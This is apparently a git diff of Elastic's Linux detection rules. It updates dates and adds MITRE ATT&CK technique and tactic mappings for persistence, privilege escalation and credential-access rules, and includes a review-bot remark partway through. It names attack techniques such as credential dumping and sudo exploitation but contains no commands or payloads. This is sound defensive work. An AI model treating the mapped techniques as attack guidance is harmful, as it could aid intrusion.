+[[rule.threat.technique.subtechnique]]
+id = "T1053.006"
+name = "Systemd Timers"
+reference = "https://attack.mitre.org/techniques/T1053/006/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/linux/persistence_systemd_service_creation.toml b/rules/linux/persistence_systemd_service_creation.toml
index bce2f849d8f..73b4395f184 100644
--- a/rules/linux/persistence_systemd_service_creation.toml
+++ b/rules/linux/persistence_systemd_service_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/06/09"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/23"
+updated_date = "2026/03/24"
 [transform]
 [[transform.osquery]]
@@ -249,21 +249,3 @@ reference = "https://attack.mitre.org/techniques/T1543/002/"
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1543"
-name = "Create or Modify System Process"
-reference = "https://attack.mitre.org/techniques/T1543/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1543.002"
-name = "Systemd Service"
-reference = "https://attack.mitre.org/techniques/T1543/002/"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/persistence_systemd_service_started.toml b/rules/linux/persistence_systemd_service_started.toml
index 4d7bc96589f..8625e7ded90 100644
--- a/rules/linux/persistence_systemd_service_started.toml
+++ b/rules/linux/persistence_systemd_service_started.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/05/17"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/23"
+updated_date = "2026/03/24"
 [transform]
 [[transform.osquery]]
@@ -233,6 +233,23 @@ id = "TA0004"
 name = "Privilege Escalation"
 reference = "https://attack.mitre.org/tactics/TA0004/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1569"
+name = "System Services"
+reference = "https://attack.mitre.org/techniques/T1569/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1569.002"
+name = "Service Execution"
+reference = "https://attack.mitre.org/techniques/T1569/002/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.parent.executable"]
diff --git a/rules/linux/persistence_systemd_shell_execution.toml b/rules/linux/persistence_systemd_shell_execution.toml
index 634b59f4e98..09970325b5c 100644
--- a/rules/linux/persistence_systemd_shell_execution.toml
+++ b/rules/linux/persistence_systemd_shell_execution.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/01/16"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/23"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -130,3 +130,21 @@ reference = "https://attack.mitre.org/techniques/T1543/002/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/persistence_tainted_kernel_module_load.toml b/rules/linux/persistence_tainted_kernel_module_load.toml index 367963adfec..46957374175 100644 --- a/rules/linux/persistence_tainted_kernel_module_load.toml +++ b/rules/linux/persistence_tainted_kernel_module_load.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/23" integration = ["system"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -120,3 +120,21 @@ reference = "https://attack.mitre.org/techniques/T1014/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_tainted_kernel_module_out_of_tree_load.toml b/rules/linux/persistence_tainted_kernel_module_out_of_tree_load.toml index b1e5e98060a..da02eaa00c3 100644 
--- a/rules/linux/persistence_tainted_kernel_module_out_of_tree_load.toml +++ b/rules/linux/persistence_tainted_kernel_module_out_of_tree_load.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["system"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -122,3 +122,21 @@ reference = "https://attack.mitre.org/techniques/T1014/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_udev_rule_creation.toml b/rules/linux/persistence_udev_rule_creation.toml index b58e6b0f925..7466666b368 100644 --- a/rules/linux/persistence_udev_rule_creation.toml +++ b/rules/linux/persistence_udev_rule_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -138,7 +138,30 @@ id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.017" +name = "Udev Rules" +reference = "https://attack.mitre.org/techniques/T1546/017/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.017" +name = "Udev Rules" +reference = "https://attack.mitre.org/techniques/T1546/017/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_unpack_initramfs_via_unmkinitramfs.toml b/rules/linux/persistence_unpack_initramfs_via_unmkinitramfs.toml index 6d45ba99f78..7fa0e51015b 100644 --- a/rules/linux/persistence_unpack_initramfs_via_unmkinitramfs.toml +++ b/rules/linux/persistence_unpack_initramfs_via_unmkinitramfs.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -112,6 +112,11 @@ id = "T1542" name = "Pre-OS Boot" reference = "https://attack.mitre.org/techniques/T1542/" +[[rule.threat.technique.subtechnique]] +id = "T1542.003" +name = "Bootkit" +reference = "https://attack.mitre.org/techniques/T1542/003/" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" 
@@ -148,6 +153,16 @@ reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1542" +name = "Pre-OS Boot" +reference = "https://attack.mitre.org/techniques/T1542/" + +[[rule.threat.technique.subtechnique]] +id = "T1542.003" +name = "Bootkit" +reference = "https://attack.mitre.org/techniques/T1542/003/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/persistence_unusual_exim4_child_process.toml b/rules/linux/persistence_unusual_exim4_child_process.toml index 1b804697747..f30d002710e 100644 --- a/rules/linux/persistence_unusual_exim4_child_process.toml +++ b/rules/linux/persistence_unusual_exim4_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -94,6 +94,31 @@ id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/linux/persistence_unusual_pam_grantor.toml b/rules/linux/persistence_unusual_pam_grantor.toml index 962c7bb3a3f..d465614ba7f 100644 --- a/rules/linux/persistence_unusual_pam_grantor.toml +++ b/rules/linux/persistence_unusual_pam_grantor.toml 
@@ -2,7 +2,7 @@ creation_date = "2024/03/06" integration = ["auditd_manager"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -89,6 +89,16 @@ id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.003" +name = "Pluggable Authentication Modules" +reference = "https://attack.mitre.org/techniques/T1556/003/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" @@ -102,11 +112,15 @@ id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.003" +name = "Pluggable Authentication Modules" +reference = "https://attack.mitre.org/techniques/T1556/003/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [rule.new_terms] field = "new_terms_fields" value = ["auditd.data.grantors"] diff --git a/rules/linux/persistence_unusual_sshd_child_process.toml b/rules/linux/persistence_unusual_sshd_child_process.toml index 9acdc41ffa3..4c250cfc6c3 100644 --- a/rules/linux/persistence_unusual_sshd_child_process.toml +++ b/rules/linux/persistence_unusual_sshd_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -77,6 +77,11 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" 
@@ -128,6 +133,18 @@ id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/linux/persistence_user_credential_modification_via_echo.toml b/rules/linux/persistence_user_credential_modification_via_echo.toml index 3ffcadfcb8d..f41a2cc786e 100644 --- a/rules/linux/persistence_user_credential_modification_via_echo.toml +++ b/rules/linux/persistence_user_credential_modification_via_echo.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -110,3 +110,16 @@ reference = "https://attack.mitre.org/techniques/T1098/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_user_or_group_creation_or_modification.toml b/rules/linux/persistence_user_or_group_creation_or_modification.toml index 989aedbc3a6..7dd6db38297 100644 --- a/rules/linux/persistence_user_or_group_creation_or_modification.toml +++ b/rules/linux/persistence_user_or_group_creation_or_modification.toml 
@@ -2,7 +2,7 @@ creation_date = "2024/06/20" integration = ["auditd_manager"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -110,6 +110,11 @@ event.action in ("changed-password", "added-user-account", "added-group-account- [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique]] id = "T1136" name = "Create Account" @@ -124,3 +129,21 @@ reference = "https://attack.mitre.org/techniques/T1136/001/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_web_server_sus_child_spawned.toml b/rules/linux/persistence_web_server_sus_child_spawned.toml index 9bf48a74d57..96ac48f1a38 100644 --- a/rules/linux/persistence_web_server_sus_child_spawned.toml +++ b/rules/linux/persistence_web_server_sus_child_spawned.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
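Review bot: In persistence_user_or_group_creation_or_modification.toml the T1098 Account Manipulation technique added to the existing Persistence block has no sub-technique, while the new Privilege Escalation block right below it lists T1098.007 Additional Local or Domain Groups; elsewhere in this series (the PAM grantor rule, for instance) a sub-technique is mirrored into every tactic block it applies to. If T1098.007 is the intended granularity, add the same `[[rule.threat.technique.subtechnique]]` block (id, name and reference for T1098.007) after the Persistence-side `reference = "https://attack.mitre.org/techniques/T1098/"` line as well, so the two blocks agree on what the rule covers.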
@@ -221,6 +221,21 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.011" +name = "Lua" +reference = "https://attack.mitre.org/techniques/T1059/011/" + [rule.threat.tactic] id = "TA0002" name = "Execution" @@ -238,3 +253,16 @@ reference = "https://attack.mitre.org/techniques/T1071/" id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/linux/persistence_web_server_sus_command_execution.toml b/rules/linux/persistence_web_server_sus_command_execution.toml index bd1fd7cbd10..6306b468fc7 100644 --- a/rules/linux/persistence_web_server_sus_command_execution.toml +++ b/rules/linux/persistence_web_server_sus_command_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -223,3 +223,16 @@ reference = "https://attack.mitre.org/techniques/T1071/" id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/linux/persistence_web_server_sus_destination_port.toml b/rules/linux/persistence_web_server_sus_destination_port.toml index 1c274eb2f45..72aa174c920 100644 --- a/rules/linux/persistence_web_server_sus_destination_port.toml +++ b/rules/linux/persistence_web_server_sus_destination_port.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -114,11 +114,6 @@ not cidrmatch(destination.ip, "127.0.0.0/8", "::1","FE80::/10", "FF00::/8", "10. [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Persistence" -id = "TA0003" -reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat.technique]] id = "T1505" name = "Server Software Component" @@ -129,14 +124,14 @@ id = "T1505.003" name = "Web Shell" reference = "https://attack.mitre.org/techniques/T1505/003/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Execution" -id = "TA0002" -reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" 
@@ -147,15 +142,25 @@ id = "T1059.004" name = "Unix Shell" reference = "https://attack.mitre.org/techniques/T1059/004/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -name = "Command and Control" -id = "TA0011" -reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat.technique]] -name = "Application Layer Protocol" id = "T1071" +name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique]] +id = "T1571" +name = "Non-Standard Port" +reference = "https://attack.mitre.org/techniques/T1571/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/persistence_web_server_unusual_command_execution.toml b/rules/linux/persistence_web_server_unusual_command_execution.toml index e8c298819bd..cda9c6e04cf 100644 --- a/rules/linux/persistence_web_server_unusual_command_execution.toml +++ b/rules/linux/persistence_web_server_unusual_command_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/02" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -143,6 +143,18 @@ id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [rule.new_terms] field = "new_terms_fields" value = ["process.command_line"] diff --git a/rules/linux/persistence_xdg_autostart_netcon.toml b/rules/linux/persistence_xdg_autostart_netcon.toml index d51e8ec2ee0..a7011c3c5a7 100644 
--- a/rules/linux/persistence_xdg_autostart_netcon.toml +++ b/rules/linux/persistence_xdg_autostart_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/03" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -151,3 +151,21 @@ reference = "https://attack.mitre.org/techniques/T1547/013/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/persistence_yum_package_manager_plugin_file_creation.toml b/rules/linux/persistence_yum_package_manager_plugin_file_creation.toml index cfc4377bf4d..57be4ef8581 100644 --- a/rules/linux/persistence_yum_package_manager_plugin_file_creation.toml +++ b/rules/linux/persistence_yum_package_manager_plugin_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/25" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -154,6 +154,11 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml b/rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml index bfc29e3bbe6..111a373cf05 100644 
--- a/rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml +++ b/rules/linux/privilege_escalation_chown_chmod_unauthorized_file_read.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/28" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -138,3 +138,21 @@ reference = "https://attack.mitre.org/techniques/T1003/008/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1222" +name = "File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/" + +[[rule.threat.technique.subtechnique]] +id = "T1222.002" +name = "Linux and Mac File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/002/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/privilege_escalation_container_util_misconfiguration.toml b/rules/linux/privilege_escalation_container_util_misconfiguration.toml index e7e9e00b5ab..ea17cb60ff5 100644 --- a/rules/linux/privilege_escalation_container_util_misconfiguration.toml +++ b/rules/linux/privilege_escalation_container_util_misconfiguration.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/31" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -123,3 +123,16 @@ reference = "https://attack.mitre.org/techniques/T1611/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/privilege_escalation_cve_2025_32463_nsswitch_file_creation.toml b/rules/linux/privilege_escalation_cve_2025_32463_nsswitch_file_creation.toml index 1e3ddd54ee1..297133b5d36 100644 --- a/rules/linux/privilege_escalation_cve_2025_32463_nsswitch_file_creation.toml +++ b/rules/linux/privilege_escalation_cve_2025_32463_nsswitch_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/01" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -119,6 +119,16 @@ id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" diff --git a/rules/linux/privilege_escalation_cve_2025_32463_sudo_chroot_execution.toml b/rules/linux/privilege_escalation_cve_2025_32463_sudo_chroot_execution.toml index cbb17f3d837..173b44030b1 100644 --- a/rules/linux/privilege_escalation_cve_2025_32463_sudo_chroot_execution.toml +++ b/rules/linux/privilege_escalation_cve_2025_32463_sudo_chroot_execution.toml 
@@ -2,7 +2,7 @@ creation_date = "2025/10/01" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/10/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -118,7 +118,35 @@ id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.003" +name = "Sudo and Sudo Caching" +reference = "https://attack.mitre.org/techniques/T1548/003/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.003" +name = "Sudo and Sudo Caching" +reference = "https://attack.mitre.org/techniques/T1548/003/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/privilege_escalation_cve_2025_41244_vmtoolsd_lpe.toml b/rules/linux/privilege_escalation_cve_2025_41244_vmtoolsd_lpe.toml index b3c53534dd7..0ad192c73af 100644 --- a/rules/linux/privilege_escalation_cve_2025_41244_vmtoolsd_lpe.toml +++ b/rules/linux/privilege_escalation_cve_2025_41244_vmtoolsd_lpe.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/30" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -142,6 +142,16 @@ id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.007" +name = "Path Interception by PATH Environment Variable" +reference = "https://attack.mitre.org/techniques/T1574/007/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" diff --git a/rules/linux/privilege_escalation_dac_permissions.toml b/rules/linux/privilege_escalation_dac_permissions.toml index d6e99458e84..485d724da6d 100644 --- a/rules/linux/privilege_escalation_dac_permissions.toml +++ b/rules/linux/privilege_escalation_dac_permissions.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/08" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -127,6 +127,33 @@ id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" + +[[rule.threat.technique.subtechnique]] +id = "T1003.008" +name = "/etc/passwd and /etc/shadow" +reference = "https://attack.mitre.org/techniques/T1003/008/" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.004" +name = "Private Keys" +reference = "https://attack.mitre.org/techniques/T1552/004/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" [rule.new_terms] field = "new_terms_fields" value = ["process.name"] 
